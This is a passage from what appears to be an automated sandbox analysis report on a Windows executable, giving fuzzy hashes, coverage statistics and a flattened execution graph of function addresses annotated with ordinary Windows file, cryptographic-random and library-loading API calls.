                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C201A73121CB0C4FD748EF4CE451AA5B7E0FB85324F10056DE58AC3695D636E881CB42

                                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                                        Execution Coverage:7.8%
                                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                        Signature Coverage:0.5%
                                                                                                                                                                                                                                                                                                                        Total number of Nodes:1209
                                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:37
                                                                                                                                                                                                                                                                                                                        execution_graph 38246 7ff6d7ed3b53 38247 7ff6d7ed3b64 38246->38247 38296 7ff6d7ef1e80 38247->38296 38249 7ff6d7ed3c18 38318 7ff6d7ed8050 157 API calls 38249->38318 38250 7ff6d7ed3bb6 38250->38249 38251 7ff6d7ed3c01 38250->38251 38256 7ff6d7ed3c09 38250->38256 38313 7ff6d7ef1c24 38251->38313 38254 7ff6d7ed3c3d 38319 7ff6d7ed8010 13 API calls 38254->38319 38255 7ff6d7ed3ccc 38278 7ff6d7ed3c90 38255->38278 38326 7ff6d7ef2414 61 API calls 38255->38326 38308 7ff6d7ef23f0 38256->38308 38259 7ff6d7ed3c45 38262 7ff6d7ed3c54 38259->38262 38320 7ff6d7eecba8 75 API calls 38259->38320 38261 7ff6d7ed3cf9 38327 7ff6d7ef1998 138 API calls 38261->38327 38321 7ff6d7eda9d4 186 API calls wcschr 38262->38321 38266 7ff6d7ed3c5c 38322 7ff6d7ed93ac 8 API calls 38266->38322 38267 7ff6d7ed3d10 38328 7ff6d7ef18ac 38267->38328 38270 7ff6d7ed3c66 38272 7ff6d7ed3c77 38270->38272 38323 7ff6d7eeca40 61 API calls _CxxThrowException 38270->38323 38324 7ff6d7ed8090 8 API calls 38272->38324 38275 7ff6d7ed3c7f 38275->38278 38325 7ff6d7eeca40 61 API calls _CxxThrowException 38275->38325 38335 7ff6d7f1d400 48 API calls 38278->38335 38297 7ff6d7ef1e95 setbuf 38296->38297 38298 7ff6d7ef1ecb CreateFileW 38297->38298 38299 7ff6d7ef1fb8 38298->38299 38300 7ff6d7ef1f59 GetLastError 38298->38300 38301 7ff6d7ef1ff7 38299->38301 38303 7ff6d7ef1fd9 SetFileTime 38299->38303 38336 7ff6d7f04534 38300->38336 38348 7ff6d7f2a610 38301->38348 38303->38301 38306 7ff6d7ef1f78 CreateFileW GetLastError 38306->38299 38362 7ff6d7ef24e8 38308->38362 38311 7ff6d7ef240e 38311->38255 38314 7ff6d7ef1c3b 38313->38314 38315 7ff6d7ef1c37 38313->38315 38314->38315 38316 7ff6d7ef1c5d 38314->38316 38315->38256 38379 7ff6d7ef2d6c 12 API calls 2 library calls 38316->38379 38318->38254 38319->38259 38321->38266 38322->38270 38323->38272 38324->38275 38325->38278 38326->38261 38327->38267 38329 7ff6d7ef18db 38328->38329 38330 7ff6d7ef18ca 38328->38330 38329->38278 38330->38329 38331 7ff6d7ef18de 38330->38331 38332 7ff6d7ef18d6 38330->38332 38380 7ff6d7ef1930 38331->38380 38333 7ff6d7ef1c24 12 API calls 38332->38333 38333->38329 38337 7ff6d7f04549 setbuf 38336->38337 38347 7ff6d7f045a2 38337->38347 38357 7ff6d7f0472c CharUpperW 38337->38357 38339 7ff6d7f04579 38358 7ff6d7f04760 CharUpperW 38339->38358 38340 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 38341 7ff6d7ef1f74 38340->38341 38341->38299 38341->38306 38343 7ff6d7f04592 38344 7ff6d7f0459a 38343->38344 38345 7ff6d7f04629 GetCurrentDirectoryW 38343->38345 38359 7ff6d7f0472c CharUpperW 38344->38359 38345->38347 38347->38340 38349 7ff6d7f2a61a 38348->38349 38350 7ff6d7ef203a 38349->38350 38351 7ff6d7f2a6a0 IsProcessorFeaturePresent 38349->38351 38350->38250 38352 7ff6d7f2a6b7 38351->38352 38360 7ff6d7f2a894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38352->38360 38354 7ff6d7f2a6ca 38361 7ff6d7f2a66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38354->38361 38357->38339 38358->38343 38359->38347 38360->38354 38368 7ff6d7ef1af0 38362->38368 38365 7ff6d7ef23f9 38365->38311 38367 7ff6d7eeca40 61 API calls _CxxThrowException 38365->38367 38367->38311 38369 7ff6d7ef1b01 setbuf 38368->38369 38370 7ff6d7ef1b6f CreateFileW 38369->38370 38371 7ff6d7ef1b68 38369->38371 38370->38371 38372 7ff6d7ef1be1 38371->38372 38373 7ff6d7f04534 10 API calls 38371->38373 38376 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 38372->38376 38374 7ff6d7ef1bb3 38373->38374 38374->38372 38375 7ff6d7ef1bb7 CreateFileW 38374->38375 38375->38372 38377 7ff6d7ef1c14 38376->38377 38377->38365 38378 7ff6d7eeca08 10 API calls 38377->38378 38378->38365 38379->38315 38381 7ff6d7ef194c 38380->38381 38382 7ff6d7ef1964 38380->38382 38381->38382 38384 7ff6d7ef1958 CloseHandle 38381->38384 38383 7ff6d7ef1988 38382->38383 38386 7ff6d7eec9d0 10 API calls 38382->38386 38383->38329 38384->38382 38386->38383 38387 7ff6d7ed1884 38519 7ff6d7f034e4 38387->38519 38390 7ff6d7ed1926 38392 7ff6d7ed195b 38390->38392 38583 7ff6d7f03f98 63 API calls 2 library calls 38390->38583 38391 7ff6d7f034e4 CompareStringW 38393 7ff6d7ed18a6 38391->38393 38399 7ff6d7ed1970 38392->38399 38584 7ff6d7ef2ed8 100 API calls 3 library calls 38392->38584 38395 7ff6d7f034e4 CompareStringW 38393->38395 38401 7ff6d7ed18b9 38393->38401 38395->38401 38398 7ff6d7ed1915 38582 7ff6d7eeca40 61 API calls _CxxThrowException 38398->38582 38402 7ff6d7ed19b8 38399->38402 38585 7ff6d7f149f4 48 API calls 38399->38585 38401->38390 38581 7ff6d7ed1168 8 API calls 2 library calls 38401->38581 38523 7ff6d7ed5450 38402->38523 38404 7ff6d7ed19b0 38586 7ff6d7ee8444 54 API calls fflush 38404->38586 38410 7ff6d7ed72c4 76 API calls 38417 7ff6d7ed1a12 38410->38417 38411 7ff6d7ed1b04 38561 7ff6d7ee6c94 38411->38561 38412 7ff6d7ed1ae6 38557 7ff6d7ed7514 38412->38557 38415 7ff6d7ed1af2 38416 7ff6d7ed7514 72 API calls 38415->38416 38418 7ff6d7ed1aff 38416->38418 38417->38411 38417->38412 38419 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 38418->38419 38420 7ff6d7ed2f97 38419->38420 38421 7ff6d7ed1b13 38577 7ff6d7ed7148 38421->38577 38423 7ff6d7ed1c71 38424 7ff6d7ed1ca7 38423->38424 38425 7ff6d7ed63e8 8 API calls 38423->38425 38426 7ff6d7ed1ce4 38424->38426 38427 7ff6d7ed1cd5 38424->38427 38428 7ff6d7ed1c91 38425->38428 38429 7ff6d7f2a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38426->38429 38431 7ff6d7f2a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38427->38431 38430 7ff6d7ed49b8 99 API calls 38428->38430 38435 7ff6d7ed1cee 38429->38435 38432 7ff6d7ed1c9d 38430->38432 38431->38435 38433 7ff6d7ed63e8 8 API calls 38432->38433 38433->38424 38434 7ff6d7ed1d50 38437 7ff6d7f2a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38434->38437 38435->38434 38436 7ff6d7f1de30 72 API calls 38435->38436 38436->38434 38438 7ff6d7ed1d62 38437->38438 38439 7ff6d7f1dbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38438->38439 38440 7ff6d7ed1d7b 38438->38440 38439->38440 38441 7ff6d7f22bcc 66 API calls 38440->38441 38442 7ff6d7ed1dba 38441->38442 38517 7ff6d7efae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38442->38517 38443 7ff6d7ed1e1c 38445 7ff6d7ed10c0 8 API calls 38443->38445 38447 7ff6d7ed1e5d 38443->38447 38444 7ff6d7ed1dde std::bad_alloc::bad_alloc 38444->38443 38446 7ff6d7f2ba34 _CxxThrowException RtlPcToFileHeader RaiseException 38444->38446 38445->38447 38446->38443 38448 7ff6d7eda410 159 API calls 38447->38448 38503 7ff6d7ed1ef4 38447->38503 38448->38503 38449 7ff6d7ed2ccc 38450 7ff6d7ed2d0c 38449->38450 38516 7ff6d7ef8c80 72 API calls 38449->38516 38451 7ff6d7f1de30 72 API calls 38450->38451 38460 7ff6d7ed2d21 38450->38460 38451->38460 38452 7ff6d7ed2d86 38458 7ff6d7f149f4 48 API calls 38452->38458 38495 7ff6d7ed2dd0 38452->38495 38453 7ff6d7ef6688 48 API calls 38453->38503 38454 7ff6d7f1b6d0 73 API calls 38487 7ff6d7ed2005 38454->38487 38455 7ff6d7ee8444 54 API calls 38455->38487 38456 7ff6d7ed5e70 169 API calls 38456->38487 38457 7ff6d7eda504 208 API calls 38457->38495 38461 7ff6d7ed2d9e 38458->38461 38459 7ff6d7ed80e4 192 API calls 38459->38495 38460->38452 38462 7ff6d7f149f4 48 API calls 38460->38462 38464 7ff6d7ee8444 54 API calls 38461->38464 38466 7ff6d7ed2d6c 38462->38466 38463 7ff6d7ed5928 237 API calls 38463->38487 38467 7ff6d7ed2da6 38464->38467 38465 7ff6d7ef7c7c 127 API calls 38465->38495 38468 7ff6d7f149f4 48 API calls 38466->38468 38476 7ff6d7ef1c24 12 API calls 38467->38476 38473 7ff6d7ed2d79 38468->38473 38469 7ff6d7ede6c8 157 API calls 38469->38503 38470 7ff6d7eee21c 63 API calls 38470->38487 38471 7ff6d7ed1168 8 API calls 38471->38495 38472 7ff6d7edb540 147 API calls 38472->38503 38474 7ff6d7ee8444 54 API calls 38473->38474 38474->38452 38475 7ff6d7ef65b4 48 API calls 38475->38503 38476->38495 38477 7ff6d7eda4d0 12 API calls 38477->38503 38478 7ff6d7ef4554 16 API calls 38478->38503 38479 7ff6d7f1ae50 71 API calls 38483 7ff6d7ed2e39 38479->38483 38480 7ff6d7ed33b4 64 API calls 38480->38495 38481 7ff6d7ef1998 138 API calls 38481->38503 38482 7ff6d7ed5db4 46 API calls 38482->38503 38483->38479 38484 7ff6d7eeca40 61 API calls 38483->38484 38483->38495 38484->38495 38485 7ff6d7ed6188 231 API calls 38485->38495 38486 7ff6d7ef1e80 15 API calls 38486->38503 38487->38454 38487->38455 38487->38456 38487->38463 38487->38470 38491 7ff6d7edb540 147 API calls 38487->38491 38487->38503 38512 7ff6d7f149f4 48 API calls 38487->38512 38488 7ff6d7ef7c7c 127 API calls 38488->38503 38489 7ff6d7ef1930 11 API calls 38489->38503 38490 7ff6d7ed3f74 138 API calls 38490->38495 38491->38487 38492 7ff6d7eecbd0 75 API calls 38492->38503 38493 7ff6d7f149f4 48 API calls 38493->38495 38494 7ff6d7f0ba9c 195 API calls 38494->38495 38495->38457 38495->38459 38495->38465 38495->38471 38495->38480 38495->38483 38495->38485 38495->38490 38495->38493 38495->38494 38497 7ff6d7ee8444 54 API calls 38495->38497 38496 7ff6d7ed5004 49 API calls 38496->38503 38497->38495 38498 7ff6d7ef18ac 15 API calls 38498->38503 38499 7ff6d7ed1168 8 API calls 38499->38503 38500 7ff6d7f1d48c 58 API calls 38500->38503 38501 7ff6d7eda410 159 API calls 38501->38503 38502 7ff6d7ed571c 12 API calls 38502->38503 38503->38449 38503->38453 38503->38469 38503->38472 38503->38475 38503->38477 38503->38478 38503->38481 38503->38482 38503->38486 38503->38487 38503->38488 38503->38489 38503->38492 38503->38496 38503->38498 38503->38499 38503->38500 38503->38501 38503->38502 38504 7ff6d7ed5e70 169 API calls 38503->38504 38505 7ff6d7ee9be0 14 API calls 38503->38505 38506 7ff6d7f1c0a8 10 API calls 38503->38506 38507 7ff6d7ef6378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38503->38507 38508 7ff6d7f097f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 38503->38508 38509 7ff6d7ef5c0c 237 API calls 38503->38509 38510 7ff6d7ef5d40 237 API calls 38503->38510 38511 7ff6d7ed6114 216 API calls 38503->38511 38513 7ff6d7ef5708 237 API calls 38503->38513 38514 7ff6d7efaae0 237 API calls 38503->38514 38515 7ff6d7ee0d60 237 API calls 38503->38515 38518 7ff6d7efa250 237 API calls 38503->38518 38504->38503 38505->38503 38506->38503 38507->38503 38508->38503 38509->38503 38510->38503 38511->38503 38512->38487 38513->38503 38514->38487 38515->38487 38516->38450 38517->38444 38518->38503 38520 7ff6d7f034f6 38519->38520 38521 7ff6d7ed1893 38520->38521 38587 7ff6d7f1dac0 CompareStringW 38520->38587 38521->38391 38521->38401 38526 7ff6d7ed546f setbuf 38523->38526 38524 7ff6d7ed554a __scrt_fastfail 38628 7ff6d7f1c0a8 GetSystemTime SystemTimeToFileTime 38524->38628 38526->38524 38533 7ff6d7ed5588 __scrt_fastfail 38526->38533 38527 7ff6d7ed5583 38617 7ff6d7ed6eb8 38527->38617 38532 7ff6d7ed681c 54 API calls 38532->38527 38533->38527 38588 7ff6d7ed3210 38533->38588 38594 7ff6d7ee7088 38533->38594 38598 7ff6d7ed681c 38533->38598 38609 7ff6d7f17a24 38533->38609 38631 7ff6d7ed571c 38533->38631 38639 7ff6d7ee4380 14 API calls 38533->38639 38534 7ff6d7ed56e9 38624 7ff6d7f16f68 38534->38624 38536 7ff6d7ed56f6 38537 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 38536->38537 38538 7ff6d7ed19df 38537->38538 38543 7ff6d7ed72c4 38538->38543 38544 7ff6d7ed72eb 38543->38544 38755 7ff6d7ee88dc 38544->38755 38546 7ff6d7ed7302 38759 7ff6d7f0915c 38546->38759 38548 7ff6d7ed730f 38771 7ff6d7f07044 38548->38771 38551 7ff6d7f2a444 new 4 API calls 38552 7ff6d7ed73e3 38551->38552 38554 7ff6d7ed73f5 __scrt_fastfail 38552->38554 38787 7ff6d7ef894c 38552->38787 38776 7ff6d7ee9be0 38554->38776 38558 7ff6d7ed7539 38557->38558 38880 7ff6d7f0922c 38558->38880 38563 7ff6d7ee6d45 38561->38563 38565 7ff6d7ee6cbc 38561->38565 38562 7ff6d7ee6d83 38562->38421 38563->38562 38566 7ff6d7ee6d69 38563->38566 38896 7ff6d7f09f78 8 API calls 2 library calls 38563->38896 38564 7ff6d7ee6cd9 38568 7ff6d7ee6cf3 38564->38568 38892 7ff6d7f09f78 8 API calls 2 library calls 38564->38892 38565->38564 38891 7ff6d7f09f78 8 API calls 2 library calls 38565->38891 38566->38562 38897 7ff6d7f09f78 8 API calls 2 library calls 38566->38897 38571 7ff6d7ee6d0d 38568->38571 38893 7ff6d7f09f78 8 API calls 2 library calls 38568->38893 38574 7ff6d7ee6d2b 38571->38574 38894 7ff6d7f09f78 8 API calls 2 library calls 38571->38894 38574->38562 38895 7ff6d7f09f78 8 API calls 2 library calls 38574->38895 38578 7ff6d7ed7162 38577->38578 38579 7ff6d7ed7167 38577->38579 38898 7ff6d7ed6c64 130 API calls _UnwindNestedFrames 38578->38898 38581->38398 38582->38390 38583->38392 38584->38399 38585->38404 38586->38402 38587->38521 38589 7ff6d7ed32e9 38588->38589 38590 7ff6d7ed3231 38588->38590 38589->38533 38590->38589 38640 7ff6d7ee4380 14 API calls 38590->38640 38592 7ff6d7ed329c 38592->38589 38641 7ff6d7ef2a20 22 API calls 2 library calls 38592->38641 38595 7ff6d7ee70a4 38594->38595 38597 7ff6d7ee70c5 38595->38597 38642 7ff6d7ef8558 10 API calls 2 library calls 38595->38642 38597->38533 38643 7ff6d7ed6714 38598->38643 38600 7ff6d7ed6836 38601 7ff6d7ed6853 38600->38601 38654 7ff6d7f348c0 31 API calls _invalid_parameter_noinfo 38600->38654 38601->38533 38603 7ff6d7ed684b 38603->38601 38604 7ff6d7ed68a9 std::bad_alloc::bad_alloc 38603->38604 38655 7ff6d7f2ba34 RtlPcToFileHeader RaiseException 38604->38655 38606 7ff6d7ed68c4 38656 7ff6d7ed7188 12 API calls 38606->38656 38608 7ff6d7ed68eb 38608->38533 38614 7ff6d7f17a4f 38609->38614 38615 7ff6d7f17a59 38609->38615 38610 7ff6d7f17a7c 38693 7ff6d7f1b6d0 73 API calls _Init_thread_footer 38610->38693 38613 7ff6d7f17b1c 60 API calls 38613->38615 38614->38533 38615->38610 38615->38613 38615->38614 38661 7ff6d7f171fc 38615->38661 38694 7ff6d7ee41b0 14 API calls 2 library calls 38615->38694 38618 7ff6d7ed6f5c 38617->38618 38619 7ff6d7ed6ee6 38617->38619 38618->38534 38744 7ff6d7f19f64 8 API calls __BuildCatchObjectHelper 38619->38744 38621 7ff6d7ed6efb 38621->38618 38622 7ff6d7ed6f2f 38621->38622 38622->38621 38745 7ff6d7ed7188 12 API calls 38622->38745 38625 7ff6d7f16fb4 38624->38625 38627 7ff6d7f16f8a 38624->38627 38626 7ff6d7ef4538 FindClose 38626->38627 38627->38625 38627->38626 38629 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 38628->38629 38630 7ff6d7ed5576 38629->38630 38630->38532 38632 7ff6d7ed5742 38631->38632 38634 7ff6d7ed575d 38631->38634 38632->38634 38750 7ff6d7f03520 12 API calls 2 library calls 38632->38750 38746 7ff6d7f03610 38634->38746 38637 7ff6d7ed57fc 38637->38533 38639->38533 38640->38592 38641->38589 38642->38595 38645 7ff6d7ed6738 38643->38645 38653 7ff6d7ed67a7 __BuildCatchObjectHelper 38643->38653 38644 7ff6d7ed6765 38649 7ff6d7ed67e1 38644->38649 38650 7ff6d7ed6786 38644->38650 38645->38644 38657 7ff6d7eeca6c 48 API calls 3 library calls 38645->38657 38647 7ff6d7ed6759 38658 7ff6d7eecb64 8 API calls 38647->38658 38649->38653 38660 7ff6d7eecb64 8 API calls 38649->38660 38650->38653 38659 7ff6d7eecb64 8 API calls 38650->38659 38653->38600 38654->38603 38655->38606 38656->38608 38657->38647 38667 7ff6d7f17217 setbuf 38661->38667 38662 7ff6d7f173c5 38695 7ff6d7ef45cc 38662->38695 38664 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 38665 7ff6d7f1776f 38664->38665 38665->38615 38667->38662 38677 7ff6d7f1729c 38667->38677 38687 7ff6d7f1725a 38667->38687 38702 7ff6d7ef4554 38667->38702 38668 7ff6d7f17453 38670 7ff6d7f17464 38668->38670 38673 7ff6d7f17476 38668->38673 38716 7ff6d7f17c38 55 API calls 3 library calls 38670->38716 38672 7ff6d7f176ef 38672->38687 38719 7ff6d7ef8558 10 API calls 2 library calls 38672->38719 38689 7ff6d7f17496 38673->38689 38699 7ff6d7ef4538 38673->38699 38674 7ff6d7f17471 38674->38673 38678 7ff6d7f173bb 38677->38678 38680 7ff6d7f1732e 38677->38680 38710 7ff6d7f2a444 38678->38710 38682 7ff6d7f1734a 38680->38682 38683 7ff6d7f17342 38680->38683 38684 7ff6d7f1737e 38682->38684 38682->38687 38708 7ff6d7ee4380 14 API calls 38682->38708 38683->38672 38683->38687 38690 7ff6d7f17656 38683->38690 38717 7ff6d7ee4380 14 API calls 38683->38717 38684->38687 38709 7ff6d7eecbd0 75 API calls 38684->38709 38685 7ff6d7ef4554 16 API calls 38685->38687 38687->38664 38689->38685 38689->38687 38690->38672 38690->38687 38690->38690 38691 7ff6d7f17723 38690->38691 38718 7ff6d7edc214 8 API calls 2 library calls 38691->38718 38694->38615 38697 7ff6d7ef45ed 38695->38697 38696 7ff6d7ef46ec 15 API calls 38696->38697 38697->38696 38698 7ff6d7ef46b2 38697->38698 38698->38668 38698->38683 38700 7ff6d7ef454f 38699->38700 38701 7ff6d7ef4549 FindClose 38699->38701 38700->38689 38701->38700 38703 7ff6d7ef4570 38702->38703 38704 7ff6d7ef4574 38703->38704 38720 7ff6d7ef46ec 38703->38720 38704->38677 38707 7ff6d7ef458d FindClose 38707->38704 38708->38684 38709->38687 38713 7ff6d7f2a44f 38710->38713 38711 7ff6d7f2a47a 38711->38662 38713->38711 38733 7ff6d7f336c0 38713->38733 38736 7ff6d7f2b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38713->38736 38737 7ff6d7f2b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38713->38737 38716->38674 38717->38690 38718->38687 38719->38687 38721 7ff6d7ef4705 setbuf 38720->38721 38722 7ff6d7ef47a4 FindNextFileW 38721->38722 38723 7ff6d7ef4733 FindFirstFileW 38721->38723 38724 7ff6d7ef478b 38722->38724 38725 7ff6d7ef47ae GetLastError 38722->38725 38723->38724 38726 7ff6d7ef4749 38723->38726 38729 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 38724->38729 38725->38724 38727 7ff6d7f04534 10 API calls 38726->38727 38728 7ff6d7ef475b 38727->38728 38730 7ff6d7ef475f FindFirstFileW 38728->38730 38731 7ff6d7ef477a GetLastError 38728->38731 38732 7ff6d7ef4587 38729->38732 38730->38724 38730->38731 38731->38724 38732->38704 38732->38707 38738 7ff6d7f33700 38733->38738 38743 7ff6d7f36938 EnterCriticalSection 38738->38743 38740 7ff6d7f3370d 38741 7ff6d7f36998 abort LeaveCriticalSection 38740->38741 38742 7ff6d7f336d2 38741->38742 38742->38713 38744->38621 38745->38622 38749 7ff6d7f03626 setbuf wcschr 38746->38749 38747 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 38748 7ff6d7ed57e1 38747->38748 38748->38637 38751 7ff6d7f048bc 38748->38751 38749->38747 38750->38634 38752 7ff6d7f048cb setbuf 38751->38752 38753 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 38752->38753 38754 7ff6d7f0493a 38753->38754 38754->38637 38756 7ff6d7ee8919 38755->38756 38792 7ff6d7f14b14 38756->38792 38758 7ff6d7ee8954 __scrt_fastfail 38758->38546 38760 7ff6d7f09199 38759->38760 38797 7ff6d7f2a480 38760->38797 38763 7ff6d7f2a444 new 4 API calls 38764 7ff6d7f091cf 38763->38764 38765 7ff6d7f091e1 38764->38765 38766 7ff6d7ee88dc 8 API calls 38764->38766 38767 7ff6d7f2a444 new 4 API calls 38765->38767 38766->38765 38768 7ff6d7f091f7 38767->38768 38769 7ff6d7f09209 38768->38769 38770 7ff6d7ee88dc 8 API calls 38768->38770 38769->38548 38770->38769 38772 7ff6d7ee88dc 8 API calls 38771->38772 38773 7ff6d7f07063 38772->38773 38805 7ff6d7f072c0 38773->38805 38809 7ff6d7ee901c CryptAcquireContextW 38776->38809 38780 7ff6d7ee9c2a 38819 7ff6d7f19ce4 38780->38819 38784 7ff6d7ee9c5b __BuildCatchObjectHelper 38785 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 38784->38785 38786 7ff6d7ed1a01 38785->38786 38786->38410 38836 7ff6d7f17d80 38787->38836 38793 7ff6d7f14b26 38792->38793 38794 7ff6d7f14b2b 38792->38794 38796 7ff6d7f14b38 8 API calls _UnwindNestedFrames 38793->38796 38794->38758 38796->38794 38798 7ff6d7f2a444 38797->38798 38799 7ff6d7f091be 38798->38799 38800 7ff6d7f336c0 new 2 API calls 38798->38800 38803 7ff6d7f2b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38798->38803 38804 7ff6d7f2b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38798->38804 38799->38763 38800->38798 38806 7ff6d7f072dd 38805->38806 38807 7ff6d7ed7325 38806->38807 38808 7ff6d7f2a480 4 API calls 38806->38808 38807->38551 38807->38554 38808->38807 38810 7ff6d7ee907e 38809->38810 38811 7ff6d7ee9057 CryptGenRandom CryptReleaseContext 38809->38811 38813 7ff6d7ee9c9c 11 API calls 38810->38813 38811->38810 38812 7ff6d7ee9089 38811->38812 38814 7ff6d7ee9c9c 38812->38814 38813->38812 38815 7ff6d7f1c0a8 10 API calls 38814->38815 38816 7ff6d7ee9cc5 38815->38816 38829 7ff6d7f32d74 38816->38829 38820 7ff6d7ee9c49 38819->38820 38821 7ff6d7f19d15 __BuildCatchObjectHelper 38819->38821 38823 7ff6d7f19b70 38820->38823 38821->38820 38832 7ff6d7f19d74 38821->38832 38826 7ff6d7f19bad __scrt_fastfail 38823->38826 38827 7ff6d7f19bd9 __scrt_fastfail 38823->38827 38824 7ff6d7f19d74 8 API calls 38825 7ff6d7f19c07 38824->38825 38825->38784 38826->38827 38828 7ff6d7f19d74 8 API calls 38826->38828 38827->38824 38828->38827 38830 7ff6d7ee9cd7 38829->38830 38831 7ff6d7f32d8b QueryPerformanceCounter 38829->38831 38830->38780 38831->38830 38833 7ff6d7f19dbc 38832->38833 38833->38833 38834 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 38833->38834 38835 7ff6d7f19f40 38834->38835 38835->38821 38843 7ff6d7f18094 38836->38843 38839 7ff6d7ef8a44 38840 7ff6d7ef8a5a __scrt_fastfail 38839->38840 38875 7ff6d7f1bac4 38840->38875 38844 7ff6d7f1809f 38843->38844 38847 7ff6d7f17ec8 38844->38847 38846 7ff6d7ef896e 38846->38839 38848 7ff6d7f17efa __BuildCatchObjectHelper 38847->38848 38854 7ff6d7f17fb5 38848->38854 38861 7ff6d7f1b3f0 38848->38861 38851 7ff6d7f1805c GetCurrentProcessId 38855 7ff6d7f18034 38851->38855 38852 7ff6d7f17ff1 38852->38855 38870 7ff6d7eeca6c 48 API calls 3 library calls 38852->38870 38853 7ff6d7f17f7e GetProcAddressForCaller GetProcAddress 38853->38854 38854->38851 38854->38852 38855->38846 38855->38855 38857 7ff6d7f1801f 38871 7ff6d7eecda4 10 API calls 2 library calls 38857->38871 38859 7ff6d7f18027 38872 7ff6d7eeca40 61 API calls _CxxThrowException 38859->38872 38873 7ff6d7f2a5a0 38861->38873 38864 7ff6d7f1b428 38868 7ff6d7f2a610 _UnwindNestedFrames 8 API calls 38864->38868 38865 7ff6d7f1b42c 38866 7ff6d7f048bc 8 API calls 38865->38866 38867 7ff6d7f1b444 LoadLibraryExW 38866->38867 38867->38864 38869 7ff6d7f17f72 38868->38869 38869->38853 38869->38854 38870->38857 38871->38859 38872->38855 38874 7ff6d7f1b3fc GetSystemDirectoryW 38873->38874 38874->38864 38874->38865 38878 7ff6d7f1ba70 GetCurrentProcess GetProcessAffinityMask 38875->38878 38879 7ff6d7ef89c5 38878->38879 38879->38554 38881 7ff6d7f09245 38880->38881 38888 7ff6d7ef6194 72 API calls 38881->38888 38883 7ff6d7f092b1 38889 7ff6d7ef6194 72 API calls 38883->38889 38885 7ff6d7f092bd 38890 7ff6d7ef6194 72 API calls 38885->38890 38887 7ff6d7f092c9 38888->38883 38889->38885 38890->38887 38891->38564 38892->38568 38893->38571 38894->38574 38895->38563 38896->38566 38897->38562 38898->38579 38899 7ff6d7f2b0fc 38918 7ff6d7f2aa8c 38899->38918 38903 7ff6d7f2b148 38909 7ff6d7f2b169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 38903->38909 38926 7ff6d7f3472c 38903->38926 38904 7ff6d7f2b123 __scrt_acquire_startup_lock 38904->38903 38974 7ff6d7f2b52c 7 API calls __scrt_fastfail 38904->38974 38907 7ff6d7f2b16d 38908 7ff6d7f2b1f7 38930 7ff6d7f33fc4 38908->38930 38909->38907 38909->38908 38975 7ff6d7f32574 35 API calls FindHandlerForForeignException 38909->38975 38916 7ff6d7f2b220 38976 7ff6d7f2ac64 8 API calls 2 library calls 38916->38976 38919 7ff6d7f2aaae __isa_available_init 38918->38919 38977 7ff6d7f2e2f8 38919->38977 38924 7ff6d7f2aab7 38924->38904 38973 7ff6d7f2b52c 7 API calls __scrt_fastfail 38924->38973 38928 7ff6d7f34744 38926->38928 38927 7ff6d7f34766 38927->38909 38928->38927 39026 7ff6d7f2b010 38928->39026 38931 7ff6d7f2b20c 38930->38931 38932 7ff6d7f33fd4 38930->38932 38934 7ff6d7f07e20 38931->38934 39118 7ff6d7f33c84 38932->39118 39158 7ff6d7f1b470 GetModuleHandleW 38934->39158 38940 7ff6d7f07e58 SetErrorMode GetModuleHandleW 38941 7ff6d7f148cc 21 API calls 38940->38941 38942 7ff6d7f07e7d 38941->38942 38943 7ff6d7f13e48 137 API calls 38942->38943 38944 7ff6d7f07e90 38943->38944 38945 7ff6d7ee3d3c 126 API calls 38944->38945 38946 7ff6d7f07e9c 38945->38946 38947 7ff6d7f2a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38946->38947 38948 7ff6d7f07ead 38947->38948 38949 7ff6d7f07ebf 38948->38949 38950 7ff6d7ee3f18 70 API calls 38948->38950 38951 7ff6d7ee4d1c 157 API calls 38949->38951 38950->38949 38952 7ff6d7f07ed6 38951->38952 38953 7ff6d7f07eef 38952->38953 38954 7ff6d7ee6ad0 154 API calls 38952->38954 38955 7ff6d7ee4d1c 157 API calls 38953->38955 38956 7ff6d7f07ee7 38954->38956 38957 7ff6d7f07eff 38955->38957 38958 7ff6d7ee4e48 160 API calls 38956->38958 38959 7ff6d7f07f0d 38957->38959 38961 7ff6d7f07f14 38957->38961 38958->38953 38960 7ff6d7f1b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38959->38960 38960->38961 38962 7ff6d7ee4888 58 API calls 38961->38962 38963 7ff6d7f07f57 38962->38963 38964 7ff6d7ee4fd0 268 API calls 38963->38964 38965 7ff6d7f07f5f 38964->38965 38966 7ff6d7f07f9e 38965->38966 38967 7ff6d7f07f8c 38965->38967 38971 7ff6d7f2b684 GetModuleHandleW 